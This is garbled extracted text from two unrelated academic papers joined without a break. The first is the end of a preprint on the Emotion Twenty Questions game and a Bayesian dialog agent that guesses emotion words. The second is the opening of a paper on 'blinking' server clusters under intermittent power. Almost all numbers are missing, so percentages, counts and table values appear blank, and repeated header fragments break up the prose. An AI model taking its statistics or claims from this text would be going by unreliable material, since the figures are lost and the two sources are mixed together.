terminate the game when the questioner guessed words that were synonyms of the that word the answerer picked. this led us to treat the phenomenon of synonyms with an additional rule that allowed the game to terminate if the answerer peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts could not verbally explain any difference between the two words. in this case, we considered the game to terminate successfully, but we flagged these matches and kept track of both words. of the matches played between the human players, – approximately % – terminated suc- cessfully with the questioner correctly identifying the emotion that the answerer picked or a word that the answerer felt was a synonym. the mean and median number of questions asked per game was . and , respectively, when failures to correctly guess the emotion were averaged in as questions. of the successfully terminated matches, terminated with synonyms. the unsuccessfully termi- nated matches that were considered failures consisted of several distinct cases. the questioner player could give up early if they had no clue ( / ), they could give up at twenty questions ( / ), or they could pass twenty questions due to losing count or as a matter of pride ( / ). the four remaining cases were considered failures because the answerer inadvertently gave away the answer due to a typing error or giving an unduly generous hint. there were unique words that players chose in the human-human games, of which were correctly identified. these are listed in table . there was a total of question-asking events. of the questions, were unique ( after normal- izing the questions for punctuation and case). in table we list some of the questions that occurred more than once. since the surface forms of the questions vary widely, we used manual preprocessing to standardize the questions to a logical form that is invariant to wording. this logical form converted the surface forms to a pseudo-code language by converting the emotion names to nouns if possible, standardizing attributes of emotions and the relations of emotions to situations and events. examples of the standardized questions are shown in table . after this semantic standardization, there were a total of question types. . . human-computer emo q using the human-human data described earlier in section . and the computational model and algorithm described in section , we built a computer agent to play the questioner role in emo q games. the emo q dialog agent was implemented using a server-side web application that maintained the belief state and episodic buffer for each open connection. the belief state was serialized to emotionml (schröder et al., ; burkhardt et al., ) and saved in a session database between each question-answer turn. to test the proposed model of socratic epistemology for verbal emotional intelligence, we conducted two experiments to assess the performance of the agent. the first experiment was a small pilot study of subjects who played three matches against the agent (kazemzadeh et al., ). in the pilot study, the subjects were recruited locally. subjects were asked to pick three emotion words, one that they thought was “easy”, one that was “medium”, and a third that was “difficult”. these difficulty ratings were described in terms of a person’s maturity and vocabulary: an “easy” emotion word was one that a child could guess, whereas a “difficult” word was one that would require maturity and a sophisticated vocabulary to guess. the peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts pilot study was designed to assess the feasibility of the agent design but did not use training beyond the original human-human data. the second experiment was a larger experiment that forms the key experimental contribution reported by this paper. it followed the same methodology as the pilot study, but with subjects recruited from amazon mechanical turk. these subjects were selected to come from the united states, speak english fluently, and have high past acceptance rates as mechanical turkers. in the second experiment, the parameters of the model were updated every ten subjects. thus, there were ten waves of ten subjects, each playing matches against the automated agent, which yielded matches. after each ten subjects, the model described in section was updated based on the total counts of the corpus to that point. in addition to updating the probabilities of the models semantic knowledge (likelihoods), new vocabulary items were added if encountered. . results the results of our pilot experiments on fifteen subjects are summarized in table . to compare the agent’s performance with human performance, we used two objective measures and one subjective measure. the success rate, shown in column two of table , is an objective measure of how often the emo q matches ended with the agent successfully guessing the user’s emotion. the number of turns it took for the agent to guess the emotion is the other objective measure. the last column, naturalness, is a subjective measure where users rated how human-like the agent was, on a - scale. in the pilot study, the agent obtained a performance of % successful outcomes (where the emotion word was correctly guessed). this performance was much less than in the human-human experiments, where successful outcomes occurred in % of emo q matches. however, the results indicated that this performance was due to sparcity of data. the emotion words chosen by the subjects as “easy” were recognized by the agent with similar success rate and number of required turns as human-human matches. some examples of “easy” emotions are anger, happiness, and sadness. however, successful outcomes were fewer in emotions chosen as “medium” and “difficult”. some examples of “medium” emotions are contentment, curiosity, love, and tiredness. pride, frustration, vindication, and zealousness are examples of “difficult” emotions. overall, new emotion words were encountered in the pilot study. the results in terms of successful outcomes and number of turns required to guess the emotion word are roughly reflected in the percent of words that are in-vocabulary. despite the low performance on emotion words rated “medium” and “difficult”, there was not a corresponding decrease in the perceived naturalness of the questioner agent. this led us to believe that the model could reproduce somewhat natural behavior, but that the data we had was insufficient due to the amount of out-of-vocabulary words in the medium and difficult classes, which motivated us to perform the second, larger-scale experiment with players from peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts easy medium difficult p e r c e n t s u c c e s s experiment final pilot success rate easy medium difficult # t u r n s experiment final pilot average number of turns easy medium difficult p e r c e n t in - v o c a b . experiment final pilot in-vocabulary rate figure : results of initial automated agent pilot compared to the final experiment of matches on mechanical turk, in which the agent was retrained every matches. mechanical turk. in the larger scale mechanical turk experiment, we aimed to improve performance by retraining the model after each batch of subjects. this strategy did in fact increase the successful outcome rate and reduced the length of the emo q dialogs (number of questions), as can be seen from comparing tables and , which are visualized in figure . across all three difficulty classes, the successful outcome rate improved. the “difficult” class had the largest relative improvement in successful outcomes, increasing from % to %, and the overall successful outcome increased from % to %. the lengths of the emo q dialogs decreased most for the medium difficulty class, resulting in an average of . less turns for this class. overall, the decrease in dialog length decreased from . to . turns. one surprising result was that even after collecting data from emo q dialogs (more than doubling the earlier human-human data), the out-of-vocabulary rate stayed nearly the same. we had expected out-of vocabulary-words to become fewer as more data had been seen. however, with each round of the mechanical turk experiment, we continued to receive new emotion words rather than converging to a closed vocabulary. for the mechanical turk experiment, we did not ask subjects about the perceived naturalness of the agent in order to save on time, and hence costs to pay the turkers, so unfortuntately we cannot say whether the perceived naturalness increased. of the subjects, only one was rejected, due to misunderstanding the task by choosing the words “easy”, “medium”, and “difficult” instead of emotion words. this level of acceptance, approximately % is rather high for mechanical turk, showing a high degree of cooperation. several users commented that we could have paid less because the task was fun. a complete listing of the words chosen by the subjects of the experiment is given in table . it can be seen that there are a wide variety of words. a few (those marked by “?”) were questionable in the authors’ intuitions, but otherwise the words showed a high level of understanding and cooperation by the mechanical turkers. the three difficulty classes of words were not disjoint: some words like anger, disgust, love, and confusion spanned several categories. it can be concluded that these three difficulty levels do not form a peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts precise, natural classes of emotion words, but the levels do show a trend toward a smaller basic vocabulary and a wider open vocabulary. the difficulty levels also served as a method to elicit diverse words. the original human-human dialogs identified unique emotion words, after the pilot study there were unique emotion words, and after the large-scale mechanical turk experiment there were unique emotion words. . discussion the human-human emo q data abounds in highly nuanced natural language descriptions of emotion. for example, one human-human emo q game ended with a discussion of whether “pride” and “proud” refer to the same emotion: [regarding “proud” vs. “pride”] because my intuition was that they’re different... you know pride sometimes has a negative connotation in another human-human emo q dialog, a player had difficulty answering whether “anger” was a negative emotion: [questioner:] so is it a negative emotion? [answerer:] sort of, but it can be righteous in one human-computer game, one player differentiated the emotion of loving from the emotion of being loved and another player picked the emotion “maudlin”, which the authors needed to look up in a dictionary. given the highly nuanced, idiosyncratic descriptions in the human-human data, we were surprized at the amount of successful game outcomes in the human-human emo q games and we were initially unsure whether devising an automated agent would be feasible. although analyzing this level of detail is beyond the scope of many current systems, we saw that it is a task that humans can do with high success rates. in fact the successful outcome rates in the human-human emo q games are comparable to agreement rates on emotional annotations at a much coarser level, such as labeling data with nine basic emotion labels (busso et al., ). the human-computer results showed us that it possible for computer agents to perform well at the questioner role of emo q and moreover that the agent can learn new vocabulary items and improve its performance past the human-human bootstrap data. the fully trained agent successfully completed % of the emo q games, which is % of human-human performance and % better than the bootstrapped agent. the agent’s emotion word vocabulary nearly doubled after the mechanical turk experiment. normally larger emotion vocabularies results in less agreement in annotation tasks but this showed that in the emo q dialog task, vocabulary size is not a weakness but rather a strength. even when the agent fails to guess the human opponent’s emotion word in the emo q game, the agent’s behavior of searching for knowledge peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts makes it appear human-like, which enables the agent maintain user engagement and learn from new, out-of- vocabulary words. the ground truth issue involved in annotating recorded data with descriptive labels is a challenge that the socratic epistemology can shed light on. the traditional annotation task seeks to have human annotators assign one of a number of labels to data. in the case of emotion research, usually the labels are a controlled vocabulary of several emotion descriptors, like “angry”, “happy”, “sad”, “disgusted”, “fearful”, “surprised”, and “neutral”. the problem with this approach is that these labels often do not fit realistic emotional data. theoretically, our approach addresses the issue of ground truth in the annotation task with the notion of epistemology, which frames the issue as justification of belief rather than ground truth. practically, our approach addresses the issue of non-prototypical emotions by enabling a more nuanced representation where the description is not a small, closed set of alternatives but rather an interactive process of communication over a large, open set of natural language descriptions. though this more nuanced view brings with it new challenges, we have shown the design of an intelligent dialog agent is a feasible way of dealing with these challenges. we plan to further continue this research in several ways. first, we hope to see the effect of modality on how people describe emotions in natural language. the current work was limited to text-based chat, so the paralinguistic data that may help to convey emotional information was minimized. including audio and video data may allow greater convergence of the players to agree upon the unknown emotion in emo q. another area of future research will be to model the answerer role. the current research focused on the questioner role, but the answerer role will offer additional challenges and insights. in particular, automating the answerer role will require more robust natural language understanding because it will need to process to new, unseen questions from users, whereas the questioner used a fixed set of questions and only had to process answers to yes/no questions. the answerer would also likely require a different model than the socratic, question-asking model presented in this paper. a successful answerer agent would allow a pleasing closed-loop simulation where both roles of emo q are played by computer. there are also further areas to explore for the questioner agent, in particular, the criterion for choosing each question. finally, we think that this approach can improve emotion annotation and other annotation tasks, such as coding behavioral data for psychological assessment. in these tasks human annotators are aksed to label data using a controlled vocabulary of words and agreement is established statistically between isolated annotators. however, we have shown that humans are able to communicate with high accuracy using a large, subjective vocabulary and we feel that allowing natural language descriptions in an interactive, question-asking setting will allow for more accurate and less constrained annotations. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . conclusion the main goals of this paper were to formulate a theoretical and computational model for a subset of human emotional language. we called this model the socratic epistemology for verbal emotional intelligence because uses question-asking to justify beliefs about emotions in a natural language dialog context. we presented the emotion twenty questions (emo q) game and showed that the level of human performance was high despite not limiting the players to any predefined emotion vocabulary. we also presented an automated agent that can play the question-asking role of emo q. this agent uses a sequential bayesian belief update algorithm to simulate a cognitive processing by which the agent updates its belief state of candidate emotion words over time. this framework was inspired by a method of question-asking that was proposed by the ancient philosopher socrates and the field of epistemology: [gorgias:] just as different drugs draw forth different humors from the body – some putting a stop to disease, others to life – so too with words: some cause pain, others joy, some strike fear, some stir the audience to boldness, some benumb and bewitch the soul with evil persuasion” (gorgias, encomium of helen, c. b.c.). socrates: you, gorgias, like myself, have had great experience of disputations, and you must have observed, i think, that they do not always terminate in mutual edification, or in the definition by either party of the subjects which they are discussing;. . . now if you are one of my sort, i should like to cross-examine you, but if not i will let you alone. and what is my sort? you will ask. i am one of those who are very willing to be refuted if i say anything which is not true, and very willing to refute any one else who says what is not true, and quite as ready to be refuted as to refute. (plato, gorgias, b.c.) in the first quote above, gorgias, a sophist rhetorician, describes the effects of words on a person’s emotions. gorgias describes emotions by making reference to the theory of physiological humors. humankind’s con- ception of emotions has changed since the time of the ancients, who believed that emotions were generated from bodily “humors”, which in turn were derived from alchemical elements, but our conception of emotion is still largely expressible through language. in the second quote, socrates (as quoted by plato) cross-examines gorgias to determine gorgias’ beliefs. socrates applied his method of question-asking to understand beliefs about complex abstract concepts that were disputed in ancient times. two millenia later we have used a computational implementation of this method to make a dialog agent better understand human beliefs about emotional concepts. we have provided an anonymized version of data we gathered from emo q, source code for the exper- iments, demos, and other resources at http://sail.usc.edu/emo q . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts . references cyril allauzen and michael riley. a pushdown transducer extension for the openfst library. in proceedings of the conference on implementation and application ofautomata, . allan d. baddeley. the episodic buffer: a new component of working memory? trends in cognitive science, ( ): – , . lisa feldman barrett. are emotions natural kinds? perspectives on psychological science, ( ): – , march . felix burkhardt, christian becker-asano, edmon begoli, roddy cowie, gerhard fobe, patrick gebhard, abe kazemzadeh, igmar steiner, and tim llewellyn. application of emotionml. in emotion, social signals, sentiment, and linked open data (es lod) , . carlos busso, murtaza bulut, chi-chun lee, abe kazemzadeh, emily mower, samuel kim, jeannette chang, sungbok lee, and shrikanth narayanan. iemocap: interactive emotional dyadic motion capture database. journal of language resources and evaluation, ( ): – , . valeria carofiglio, fiorella de rosis, and nicole novielli. cognitive emotion modeling in natural language communication, pages – . springer, . umberto eco and thomas a. sebeok, editors. the sign of three: dupin, holmes, peirce. advances in semiotics. indiana university press, . brandy n. frazier, susan a. gelman, and henry m. wellman. preschoolers’ search for explanatory infor- mation within adult-child conversation. child development, ( ): – , november/december . thomas l griffiths, charles kemp, and joshua b tenenbaum. bayesian models of cognition. cambridge university press, . jaakko hintikka. socratic epistemology: explorations of knowledge-seeking by questioning. cambridge university press, . charles f. hockett and stuart altmann. a note on design features, pages – . indiana university press, . jeff howe. the rise of crowdsourcing. wired magazine, . , june . sep kamvar and jonathan harris. we feel fine: an almanac of human emotion. scribner, . abe kazemzadeh. natural language description of emotion. phd thesis, university of southern california, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts abe kazemzadeh, panayiotis g. georgiou, sungbok lee, and shrikanth narayanan. emotion twenty ques- tions: toward a crowd-sourced theory of emotions. in proceedings of acii’ , . abe kazemzadeh, james gibson, juanchen li, sungbok lee, panayiotis g. georgiou, and shrikanth narayanan. a sequential bayesian agent for computational ethnography. in proceedings of interspeech, portland, or, october . brian king. the conceptual structure of emotional experience in chinese. phd thesis, ohio state univer- sity, . rada mihalcea and hugo liu. a corpus-based approach to finding happiness. in aaai spring symposium on computational approaches to weblogs, march . url http://www.cse.unt.edu/~rada/papers/ mihalcea.aaaiss .pdf. emily mower, angeliki metallinou, chi-chun lee, abe kazemzadeh, carlos busso, sungbok lee, and shrikanth narayanan. interpreting ambiguous emotional expressions. in acii special session: recognition of non-prototypical emotion from speech- the final frontier?, amsterdam, netherlands, . charles sanders peirce. some consequences of four incapacities. journal of speculative philosophy, : – , . url http://www.iupui.edu/~peirce/writings/v /w /w _ /v _ .htm. edmond t. rolls. what are emotions, why do we have emotions, and what is their computational basis in the brain, chapter , pages – . oxford university press, . bertrand russell. on denoting. mind, : – , . marc schröder, paolo baggia, felix burkhardt, catherine pelachaud, christian peter, and enrico zovato. w c candidate recommendation: emotion markup language (emotionml) . , may . url http: //www.w .org/tr/emotionml/. http://www.w .org/tr/emotionml/. phillip r. shaver, upekkha murdaya, and r. chris fraley. structure of the indonesian emotion lexicon. asian journal of social psychology, : – , . mark steyvers, thomas l griffiths, and simon dennis. probabilistic inference in human semantic memory. trends in cognitive sciences, ( ): – , . luis von ahn and laura dabbish. labeling images with a computer game. in proceedings of the sigchi conference on human factors in computing systems, . fei xu and joshua b tenenbaum. word learning as bayesian inference: evidence from preschoolers. in proceedings of the twenty-seventh annual conference of the cognitive science society, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.cse.unt.edu/~rada/papers/mihalcea.aaaiss .pdf http://www.iupui.edu/~peirce/writings/v /w /w _ /v _ .htm http://www.w .org/tr/emotionml/ http://www.w .org/tr/emotionml/ http://www.w .org/tr/emotionml/ ning zhong, jiming liu, y.y. yao, and s. ohsuga. web intelligence. in computer software and applications conference, . zoltán kövecses. metaphor and emotion: language, culture, and body in human feeling. cambridge university press, . peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : example dialog from emo q questioner agent where the human interlocutor has chosen “relaxation”. speaker/event utterance/content agent let me know when you are ready... user ok belief update (uniform distribution) agent is it very intense? user no belief update relaxation: . , hope: . , boredom: . , ..., anger: . agent is it positive? user yes belief update hope: . , relaxation: . , cheerfulness: . , ... agent is it an emotion that just pops up spontaneously (vs being triggered by something)? user depends belief update hope: . , relaxation: . , cheerfulness: . , ... agent is it caused by something in particular? user well, yes, you do need the right conditions belief update relaxation: . , hope: . , cheerfulness: . , ... agent is it relaxation? user yes agent so did i get it right? user yes, you got it agent awesome! would you like to play again? user no, thanks. agent thank you for playing peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : emotion words from human-human emo q matches. matches that terminated with words that the answerers felt to be synonyms are denoted by parentheses. emotions (synonyms) count # correct ... emotions (synonyms) count # correct admiration guilt adoration happiness affection (love) helplessness amusement hope (feeling lucky) anger insecurity (shyness) annoyance (irritated) jealousy (envy) anxiety joy apathy (uninterested) loneliness awe love boredom madness (anger) bravery melancholy calm pity (sympathy) cheerfulness pride confidence proud confusion regret contempt relief contentment (calm) sadness depression (misery) satisfaction devastation serenity disappointment shame disgust shock dread (hopelessness) shyness eagerness (determination) silly embarrassment soberness enthusiasm (eagerness) sorrow (sadness) envy (jealousy) stress exasperation suffering excitement surprise exhilaration (thrill) tense (uncomfortable) exhaustion terror fear (distress,scared) thankful frustration thrill (entrancement) fury tiredness glee wariness gratefulness worry (anxiety, scared) grumpiness total peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : examples of some of the questions that occurred multiple times (disregarding case and punctuation). question count is it positive? ok is it a positive emotion? is it a positive emotion? is it intense? ok is it positive? is it a strong emotion? is it like sadness? is it sadness? is it pride? is it neutral? is it like anger? is it surprise? is it an emotion that makes you feel good? thrilled? regret? pleased? is it very intense? is it love? is it kinda like anger? is it associated with sadness? ... ... ok is it a negative emotion? ok is it a good emotion? okay is it a strong emotion? is it highly activated? is it directed towards another person? is it directed at another person? is it associated with satisfaction? is it associated with optimism? is it associated with disappointment? is it an emotion that lasts a long time does it vary in intensity? table : examples of question standardization. standardized question examples cause(emptyset,e) can you feel the emotion without any external events that cause it? is it an emotion that just pops up spontaneously (vs being triggered by something)? cause(otherperson,e) is it caused by the person that it’s directed at? do you need someone to pull this emotion out of you or evoke it? if so, who is it? e.valence==negative is it considered a negative thing to feel? ) so is it a negative emotion? situation(e,birthday) would you feel this if it was your birthday? is it a socially acceptable emotion, say, at a birthday party? e==frustration oh, is it frustrated? frustration? peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts table : experimental results for subject pilot study ( emo q games). difficulty % success avg. turns % in vocab. naturalness easy % . % . medium % . % . difficult % . % . total % . % . table : experimental results for subject mechanical turk study ( emo q games). difficulty % success avg. turns % in vocab. easy % . % medium % . % difficult % . % total % . . % table : observed emotion words by difficulty. words that were attested but which did not fit the authors’ broad intuitions are marked with ’ ?’. the same words in multiple categories indicate that different subjects had differing opinions about difficulty. difficulty examples easy happiness, anger, sadness, calm, confusion, love, mad, hate, joy medium anger, confusion, contentment, curiosity, depression, disgust, excitement, fear, hate, irritation, love, melan- choly, sorrow, surprise, tiredness, envy, outrage, elation, suffering, jealousy, nervousness, sympathy, thrill, upset, joy, anxiety, frustration, flustered, enjoyment, exhaustion, fury, bordom, delight, cold, apathy, hos- tility, loved, annoyance, playfulness, downtrodden, stupor, despair, pissed, nostalgia, overjoyed, indifference, courage difficult devastation, disgust, ecstasy, ennui, frustration, guilt, hope, irritation, jealousy, morose, proud, remorse, vin- dication, zealousness, elation, mischievous, usure, angst, patience, despise, inspired, euphoria, exuberance, worrying, melancholy, ambivalence, love, loneliness, exacerbated(?), avarace, stress, envy, disillusionment, maudlin, depression, confusion, maniacal, ambiguity, concern, pleasure, shame, indifference, anger, suicidal, pessimism, annoyance, sense of failure, educated(?), manic, overwhelmed, astounded, discontent, energetic, introspective, appalled, serenity, dissatisfaction, anxiety, lust, conflicted, perplexed, jubilance, disappoint- ment, satisfaction, remorse, embarrassment, downcast, guilty, enamored, alienation, exotic(?), hate, caring, resentment, pity, aversion, quixotic, infuriation peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: aug , publ: aug p re p ri n ts managing server clusters on intermittent power submitted july accepted november published december corresponding author navin sharma, nksharma@cs.umass.edu academic editor srikumar venugopal additional information and declarations can be found on page doi . /peerj-cs. copyright sharma et al. distributed under creative commons cc-by . open access managing server clusters on intermittent power navin sharma , dilip krishnappa , sean barker , david irwin and prashant shenoy college of information and computer sciences, university of massachusetts at amherst, amherst, ma, united states akamai technologies, cambridge, ma, united states department of computer science, bowdoin college, brunswick, me, united states electrical and computer engineering, university of massachusetts at amherst, amherst, ma, united states abstract reducing the energy footprint of data centers continues to receive significant attention due to both its financial and environmental impact. there are numerous methods that limit the impact of both factors, such as expanding the use of renewable energy or participating in automated demand-response programs. to take advantage of these methods, servers and applications must gracefully handle intermittent constraints in their power supply. in this paper, we propose blinking—metered transitions between a high-power active state and a low-power inactive state—as the primary abstraction for conforming to intermittent power constraints. we design blink, an application-independent hardware–software platform for developing and evaluating blinking applications, and define multiple types of blinking policies. we then use blink to design both a blinking version of memcached (blinkcache) and a multimedia cache (greencache) to demonstrate how application characteristics affect the design of blink-aware distributed applications. our results show that for blinkcache, a load-proportional blinking policy combines the advantages of both activation and synchronous blinking for realistic zipf-like popularity distributions and wind/solar power signals by achieving near optimal hit rates (within % of an activation policy), while also providing fairer access to the cache (within % of a synchronous policy) for equally popular objects. in contrast, for greencache, due to multimedia workload patterns, we find that a staggered load proportional blinking policy with replication of the first chunk of each video reduces the buffering time at all power levels, as compared to activation or load-proportional blinking policies. subjects distributed and parallel computing, multimedia, operating systems keywords green data center, intermittent power, blink, green cache, memcached, multimedia cache introduction energy-related costs have become a significant fraction of total cost of ownership (tco) in modern data centers. recent estimates attribute % of tco to both purchasing power and building and maintaining the power distribution and cooling infrastructure (hamil- ton, ). consequently, techniques for reducing the energy footprint of data centers how to cite this article sharma et al. ( ), managing server clusters on intermittent power. peerj comput. sci. :e ; doi . /peerj-cs. mailto:nksharma@cs.umass.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. continue to receive significant attention in both industry and the research community. we categorize these techniques broadly as being either primarily workload-driven or power-driven. workload-driven systems reconfigure applications as their workload demands vary to use the least possible amount of power to satisfy demand (ahmad & vijaykumar, ; moore, chase & ranganathan, ; moore et al., ). in contrast, power-driven systems reconfigure applications as their power supply varies to achieve the best performance possible given the power constraints. while prior work has largely emphasized workload-driven systems, power-driven systems are becoming increasingly important. for instance, data centers are beginning to rely on intermittent renewable energy sources, such as solar and wind, to partially power their operations (gupta, ; stone, ). intermittent power constraints are also common in developing regions that experience “brownouts” where the electric grid temporarily reduces its supply under high load (chase et al., ; verma et al., ). the key challenge in power-driven systems is optimizing application performance in the presence of power constraints that may vary significantly and frequently over time. importantly, these power and resource consumption constraints are independent of workload demands. the ability to use intermittent power introduces other opportunities, beyond increasing use of renewable energy, for optimizing a data center to be cheaper, greener, and more reliable. we argue that designing systems to exploit these optimizations will move us closer to the vision of a net-zero data center. • market-based electricity pricing. electricity prices vary continuously based on supply and demand. many utilities now offer customers access to market-based rates that vary every five minutes to an hour (elevate energy, ). as a result, the power data centers are able to purchase for a fixed price varies considerably and frequently over time. for instance, in the new england hourly wholesale market in , maintaining a fixed $ /h budget, rather than a fixed per-hour power consumption, purchases % more power for the same price (fig. ). the example demonstrates that data centers that execute delay-tolerant workloads, such as data-intensive batch jobs, have an opportunity to reduce their electric bill by varying their power usage based on price. • unexpected blackouts or brownouts. data centers often use upss for backup power during unexpected blackouts. an extended blackout may force a data center to limit power consumption at a low level to extend ups lifetime. while low power levels impact performance, it may be critical for certain applications to maintain some, even low, level of availability, e.g., disaster response applications. as we discuss, maintaining availability at low power levels is challenging if applications access distributed state. further, in many developing countries, the electric grid is highly unstable with voltage rising and falling unexpectedly based on changing demands. these “brownouts” may also affect the power available to data centers over time. • % power infrastructure utilization. another compelling use of intermittent power is continuously operating a data center’s power delivery infrastructure at %. since sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure electricity prices vary every five minutes to an hour in wholesale markets, resulting in the power available for a fixed monetary budget varying considerably over time data center capital costs are enormous, maximizing the power delivery infrastructure’s utilization by operating as many servers as possible is important. however, data centers typically provision power for peak demands, resulting in low utilization (fan, weber & barroso, a; kontorinis et al., ). in this case, intermittent power is useful to continuously run a background workload on a set of servers—designed explicitly for intermittent power—that always consume the excess power pdus are capable of delivering. since the utilization (and power usage) of a data center’s foreground workload may vary rapidly, the background servers must be capable of quickly varying power usage to not exceed the power delivery infrastructure’s limits. in this paper, we present blink, a new energy abstraction for gracefully handling intermittent power constraints. blinking applies a duty cycle to servers that controls the fraction of time they are in the active state, e.g., by activating and deactivating them in succession, to gracefully vary their energy footprint. for example, a system that blinks every s, i.e., is on for s and then off for s, consumes half the energy, modulo overheads, of an always-on system. blinking generalizes the extremes of either keeping a server active (a % duty cycle) or inactive (a % duty cycle) by providing a spectrum of intermediate possibilities. blinking builds on prior work in energy-aware design. first, several studies have shown that turning a server off when not in use is the most effective method for saving energy in server clusters (chase et al., ; pinheiro et al., ). second, blinking extends the powernap (meisner, gold & wenisch, ) concept, which advocates frequent transitions to a low-power sleep state, as an effective means of reducing idle power waste. an application’s blinking policy decides when each node is active or inactive at any instant based on both its workload characteristics and energy constraints. clearly, blinking impacts application performance, since there may not always be enough energy to power sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the nodes necessary to meet demand. hence, the goal of a blinking policy is to minimize performance degradation as power varies. in general, application modifications are nec- essary to adapt traditional server-based applications for blinking, since these applications implicitly assume always-on, or mostly-on, servers. blinking forces them to handle regular disconnections more often associated with weakly connected (terry et al., ) environ- ments, e.g., mobile, where nodes are unreachable whenever they are off or out of range. example applications for blink to demonstrate how blinking impacts common data center applications, we explore the design of blinkcache—a blinking version of memcached that gracefully handles intermittent power constraints and greencache—a distributed cache for multimedia data that runs off renewable energy—as proof-of-concept examples. memcached is a distributed memory cache for storing key-value pairs that many prominent internet sites, including livejournal, facebook, flickr, twitter, youtube, and others, use to improve their performance. for internet services that store user-generated content, the typical user is often interested in the relatively unpopular objects in the heavy tail, since these objects represent either their personal content or the content of close friends and associates. as one example, fig. depicts a popularity distribution for facebook group pages in terms of their number of fans. while the figure only shows the popularity rank of the top , pages, facebook has over million group pages in total. most of these pages are nearly equally unpopular. for these equally unpopular objects, blinking nodes synchronously to handle variable power constraints results in fairer access to the cache because the probability of finding an object becomes equal for all objects in the cache. while fair cache access is important, maximizing memcached’s hit rate requires prioritizing access to the most popular objects. we explore these performance tradeoffs in-depth for a memcached cluster with intermittent power constraints. in contrast, greencache leverages the blinking abstraction to modulate its energy footprint to match available power while minimizing both backhaul bandwidth and client access latency for a large video library. as discussed above, minimizing bandwidth usage (or cost) and maximizing users’ experience, e.g., by reducing buffering time, are the two primary goals of a multimedia cache. we analyze video traffic behavior of a large number of users for the most popular user-generated video site, youtube, and exploit traffic characteristics and video properties to design new placement and blinking policies for minimizing bandwidth usage and maximizing users’ experience. contributions in designing, implementing, and evaluating blinkcache and greencache as proof- of-concept examples of using the blink abstraction, this paper makes the following contributions. this paper combines and extends two prior conference publications: blink (sharma et al., ) and greencache (sharma et al., ). in addition to rewriting this paper from the ground up to merge our prior work, we have also designed (a) a blink emulator to emulate a renewable-powered server cluster and (b) used the emulator for scalability analysis of blinking applications on large server clusters. • make the case for blinking systems. we propose blinking systems to deal with variable power constraints in server clusters. we motivate why blinking is a beneficial abstraction sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure the popularity of web data often exhibits a long heavy tail of equally unpopular objects. this graph ranks the popularity of facebook group pages by their number of fans. for dealing with intermittent power constraints, define different types of blinking policies, and discuss its potential impact on a range of distributed applications. • design a blinking hardware/software platform. we design blink, an application- independent hardware/software platform to develop and evaluate blinking applications. our small-scale prototype uses a cluster of low-power motherboards connected to a programmable power meter that replays custom power traces and variable power traces from a solar and wind energy harvesting deployment. • design, implement, evaluate blinkcache and greencache. we use blink to experi- ment with blinking policies for blinkcache and greencache, a variant of memcached and multimedia cache, respectively, and optimize the performance for intermittent power constraints. for blinkcache, our hypothesis is that a load-proportional blinking policy, which keeps nodes active in proportion to the popularity of the data they store, combined with object migration to group together objects with similar popularities, results in near optimal cache hit rates, as well as fairness for equally unpopular objects. to validate our hypothesis, we compare the performance of activation, synchronous, and load-proportional policies for realistic zipf-like popularity distributions. we show that a load-proportional policy is significantly more fair than an optimal activation policy for equally popular objects ( x at low power) while achieving a comparable hit rate (over % at low power). for greencache, our hypothesis is that a staggered load proportional policy which keeps the nodes active based on their load and the available power in staggered manner, with replication of the first chunk of each video on all servers, yields lower buffering time for clients, compared to activation or load-proportional blinking policies, when operating under variable power. • blinking scalability performance. to see how blinking scales with the size of a cluster we emulate our small-scale server cluster and study the performance of blinkcache sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and greencache for a , node cluster. our hypothesis is that the performance of a blinking policy should be independent of the cluster size. ‘blink: rationale and overview’ provides an overview of the blinking abstraction and various blinking policies. ‘blink prototype’ presents blink’s hardware and software archi- tecture in detail, while ‘blinkcache: blinking memcached’ presents design alternatives for blinkcache, a blinking version of memcached. ‘greencache: blinking multimedia cache’ presents the design techniques for greencache, a blinking version of multimedia cache. we provide the implementation and evaluation of both applications in ‘implementation’ and ‘evaluation’, respectively. finally, ‘related work’ discusses related work, ‘applicability of blinking’ outlines the applicability of blinking to other applications, and ‘conclusion’ concludes. blink: rationale and overview today’s computing systems are not energy-proportional (barroso & hölzle, )—a key factor that hinders data centers from effectively varying their power consumption by controlling their utilization. designing energy-proportional 